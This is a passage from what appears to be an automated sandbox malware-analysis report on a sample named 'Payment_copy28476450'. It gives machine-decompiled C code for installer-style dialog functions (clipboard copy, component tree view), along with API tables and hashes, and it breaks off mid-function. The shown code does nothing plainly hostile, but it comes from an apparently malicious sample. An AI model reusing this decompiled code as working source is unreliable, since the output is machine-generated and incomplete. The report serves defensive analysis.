Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405125 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423764;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420580;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42374c == _t149) {
							ShowWindow( *0x423f88, 8);
							if( *0x42400c == _t149) {
								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
							}
							E00403F90(1);
							goto L25;
						}
						 *0x41f948 = 2;
						E00403F90(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040401E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423750, _t149);
						ShowWindow(_t154, 8);
						E00403FEC(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f90;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423750 = GetDlgItem(_a4, 0x403);
				 *0x423748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423764 = _t127;
				_v8 = _t127;
				E00403FEC( *0x423750);
				 *0x423754 = E00404889(4);
				 *0x42376c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FB7(_a4);
				if(( *0x423f98 & 0x00000003) != 0) {
					ShowWindow( *0x423750, _t149);
					if(( *0x423f98 & 0x00000002) != 0) {
						 *0x423750 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403FEC( *0x423748);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x0040512e
0x00405134
0x0040513d
0x00405140
0x004052d8
0x004052fc
0x004052fc
0x0040530f
0x0040532d
0x00405334
0x0040538b
0x0040538f
0x00000000
0x00405396
0x0040539e
0x004053a6
0x004053a9
0x004054a2
0x00000000
0x004054a2
0x004053b8
0x004053c4
0x004053ca
0x004053d0
0x004053e5
0x004053eb
0x004053d2
0x004053d7
0x004053dd
0x004053e0
0x004053e0
0x004053fb
0x00405403
0x00405406
0x0040540f
0x00405412
0x00405419
0x00405420
0x00405428
0x00405428
0x0040543f
0x0040543f
0x00405446
0x0040544c
0x00405455
0x0040545c
0x00405465
0x00405467
0x0040546a
0x00405479
0x0040547b
0x00405481
0x00405482
0x00405483
0x0040548b
0x00405496
0x0040549c
0x0040549c
0x00000000
0x00405406
0x0040538f
0x0040533c
0x0040536c
0x00405374
0x0040537f
0x0040537f
0x00405386
0x00000000
0x00405386
0x00405340
0x0040534a
0x00000000
0x00405311
0x00405317
0x0040534f
0x00000000
0x00405358
0x00405320
0x00405325
0x00405328
0x00000000
0x00405328
0x0040530f
0x00405146
0x0040514a
0x00405153
0x0040515a
0x0040515d
0x00405160
0x00405163
0x00405164
0x00405165
0x0040517e
0x00405181
0x0040518b
0x0040519a
0x004051a2
0x004051aa
0x004051af
0x004051b2
0x004051be
0x004051c7
0x004051d0
0x004051f3
0x004051f9
0x0040520a
0x0040520f
0x0040521d
0x0040522b
0x0040522b
0x00405230
0x0040523e
0x0040523e
0x00405243
0x00405246
0x0040524b
0x00405257
0x00405260
0x0040526d
0x0040527c
0x0040526f
0x00405274
0x00405274
0x00405288
0x00405288
0x0040529c
0x004052a5
0x004052ae
0x004052be
0x004052ca
0x004052ca
0x00000000

APIs

GetDlgItem.USER32 ref: 00405184
GetDlgItem.USER32 ref: 00405193
GetClientRect.USER32 ref: 004051D0
GetSystemMetrics.USER32 ref: 004051D8
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051F9
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040520A
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040521D
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040522B
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040523E
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
ShowWindow.USER32(?,00000008), ref: 00405274
GetDlgItem.USER32 ref: 00405295
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052A5
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052BE
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052CA
GetDlgItem.USER32 ref: 004051A2

Part of subcall function 00403FEC: SendMessageA.USER32(00000028,?,00000001,00403E1D), ref: 00403FFA

GetDlgItem.USER32 ref: 004052E7
CreateThread.KERNEL32 ref: 004052F5
CloseHandle.KERNEL32(00000000), ref: 004052FC
ShowWindow.USER32(00000000), ref: 00405320
ShowWindow.USER32(?,00000008), ref: 00405325
ShowWindow.USER32(00000008), ref: 0040536C
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040539E
CreatePopupMenu.USER32 ref: 004053AF
AppendMenuA.USER32 ref: 004053C4
GetWindowRect.USER32 ref: 004053D7
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405436
OpenClipboard.USER32(00000000), ref: 00405446
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
GlobalLock.KERNEL32 ref: 0040545F
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405473
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
SetClipboardData.USER32 ref: 00405496
CloseClipboard.USER32 ref: 0040549C

Strings

{, xrefs: 0040538B

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f90 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f99 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048B6(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42055c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420574;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42055c = _t315;
								 *0x420574 = _t315;
								 *0x423fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420574;
									_t196 =  *0x423fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
											E00404871(0x3ff, 0xfffffffb, E00404889(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420574);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
					_t250 = LoadBitmapA( *0x423f80, 0x6e);
					 *0x420568 =  *0x420568 | 0xffffffff;
					_v24 = _t250;
					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42055c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FB7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FB7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420574 + _t318 * 4) = _t274;
									_t288 =  *( *0x420574 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FEC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FEC(_v12);
								L89:
								return E0040401E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404954
0x0040495a
0x0040495c
0x00404962
0x00404968
0x00404975
0x0040497e
0x00404981
0x00404984
0x00404bac
0x00404bb3
0x00404bc7
0x00404bb5
0x00404bb7
0x00404bba
0x00404bbb
0x00404bc2
0x00404bc2
0x00404bd3
0x00404be1
0x00404be4
0x00404bfa
0x00404c72
0x00404c75
0x00404c77
0x00404c81
0x00404c8f
0x00404c8f
0x00404c91
0x00404c9b
0x00404ca1
0x00404cc2
0x00404ca3
0x00404cb0
0x00404cb0
0x00404ca1
0x00404c9b
0x00000000
0x00404c75
0x00404bff
0x00404c0a
0x00404c0f
0x00404c16
0x00404c1d
0x00404c27
0x00404c27
0x00404c2b
0x00404c30
0x00404c35
0x00404c4b
0x00404c37
0x00404c37
0x00404c3f
0x00404c46
0x00404c41
0x00404c41
0x00404c41
0x00404c3f
0x00404c4f
0x00404c51
0x00404c5f
0x00404c60
0x00404c6c
0x00404c6f
0x00404c6f
0x00404c30
0x00000000
0x00404c1d
0x00404c01
0x00404c08
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cc5
0x00404cc5
0x00404ccc
0x00404d40
0x00404d47
0x00404d53
0x00404d53
0x00404d5c
0x00404d5e
0x00404d65
0x00404d68
0x00404d68
0x00404d6e
0x00404d75
0x00404d78
0x00404d78
0x00404d7e
0x00404d84
0x00404d8a
0x00404d8a
0x00404d97
0x00404ee4
0x00404eeb
0x00404f08
0x00404f0e
0x00404f20
0x00404f20
0x00000000
0x00404d9d
0x00404d9f
0x00404da7
0x00404dab
0x00404dab
0x00404db3
0x00404df4
0x00404df6
0x00404e06
0x00404e09
0x00404e0e
0x00404e15
0x00404e18
0x00404eba
0x00404ec0
0x00404ece
0x00404edf
0x00404edf
0x00000000
0x00404ece
0x00404e1e
0x00404e21
0x00404e27
0x00404e2c
0x00404e2e
0x00404e30
0x00404e36
0x00404e3d
0x00404e42
0x00404e49
0x00404e4c
0x00404e4c
0x00404e53
0x00404e5f
0x00404e63
0x00404e65
0x00404e65
0x00404e55
0x00404e57
0x00404e57
0x00404e85
0x00404e91
0x00404ea0
0x00404ea0
0x00404ea2
0x00404ea5
0x00404eae
0x00000000
0x00404db5
0x00404dc0
0x00404dc3
0x00404dc8
0x00404dca
0x00404dce
0x00404dde
0x00404de8
0x00404dea
0x00404ded
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dd0
0x00404dd0
0x00404dd6
0x00404dd8
0x00404dd8
0x00404dd9
0x00404dda
0x00000000
0x00404dd0
0x00404db3
0x00404d97
0x00404cd4
0x00000000
0x00404cea
0x00404cf4
0x00404cf9
0x00000000
0x00000000
0x00404d0b
0x00404d10
0x00404d1c
0x00404d1c
0x00404d1e
0x00404d2d
0x00404d2f
0x00404d36
0x00404d39
0x00000000
0x00404d39
0x00404cd4
0x0040498a
0x0040498f
0x00404999
0x0040499a
0x004049a3
0x004049ae
0x004049b9
0x004049bf
0x004049cd
0x004049e2
0x004049e7
0x004049f2
0x004049fb
0x00404a10
0x00404a21
0x00404a2e
0x00404a2e
0x00404a33
0x00404a39
0x00404a3b
0x00404a3e
0x00404a43
0x00404a48
0x00404a4a
0x00404a4a
0x00404a6a
0x00404a6a
0x00404a6c
0x00404a6d
0x00404a72
0x00404a75
0x00404a78
0x00404a7c
0x00404a81
0x00404a86
0x00404a8a
0x00404a8f
0x00404a94
0x00404a96
0x00404a9e
0x00404b68
0x00404b7b
0x00000000
0x00404aa4
0x00404aa7
0x00404aaa
0x00404aad
0x00404aad
0x00404ab3
0x00404ab9
0x00404abc
0x00404ac2
0x00404ac3
0x00404ac8
0x00404ad1
0x00404ad8
0x00404adb
0x00404ade
0x00404ae1
0x00404b1d
0x00404b46
0x00404b1f
0x00404b2c
0x00404b2c
0x00404ae3
0x00404ae6
0x00404af5
0x00404aff
0x00404b07
0x00404b0e
0x00404b16
0x00404b16
0x00404ae1
0x00404b4c
0x00404b4d
0x00404b59
0x00404b59
0x00404b66
0x00404b81
0x00404b85
0x00404ba2
0x00404ba7
0x00404baa
0x00000000
0x00404b87
0x00404b8c
0x00404b95
0x00404f22
0x00404f34
0x00404f34
0x00404b85
0x00000000
0x00404b66
0x00404a9e

APIs

GetDlgItem.USER32 ref: 0040494D
GetDlgItem.USER32 ref: 0040495A
GlobalAlloc.KERNEL32(00000040,?), ref: 004049A6
LoadBitmapA.USER32 ref: 004049B9
SetWindowLongA.USER32(?,000000FC,00404F37), ref: 004049D3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
SendMessageA.USER32(?,00001109,00000002), ref: 00404A10
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A1C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A2E
DeleteObject.GDI32(?), ref: 00404A33
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A5E
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A6A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AFF
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B2A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B3E
GetWindowLongA.USER32 ref: 00404B6D
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B7B
ShowWindow.USER32(?,00000005), ref: 00404B8C
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C8F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF4
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D09
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D2D
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D53
ImageList_Destroy.COMCTL32(?), ref: 00404D68
GlobalFree.KERNEL32 ref: 00404D78
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DE8
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404E91
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA0
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
ShowWindow.USER32(?,00000000), ref: 00404F0E
GetDlgItem.USER32 ref: 00404F19
ShowWindow.USER32(00000000), ref: 00404F20

Strings

N, xrefs: 00404BCA
, xrefs: 00404EF8
M, xrefs: 00404AE6

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004043F5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd50;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055A0(0x3fb, _t146);
					E00405F5D(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055A0(0x3fb, _t146);
							if(E004058CF(_t185, _t146) == 0) {
								_v8 = 1;
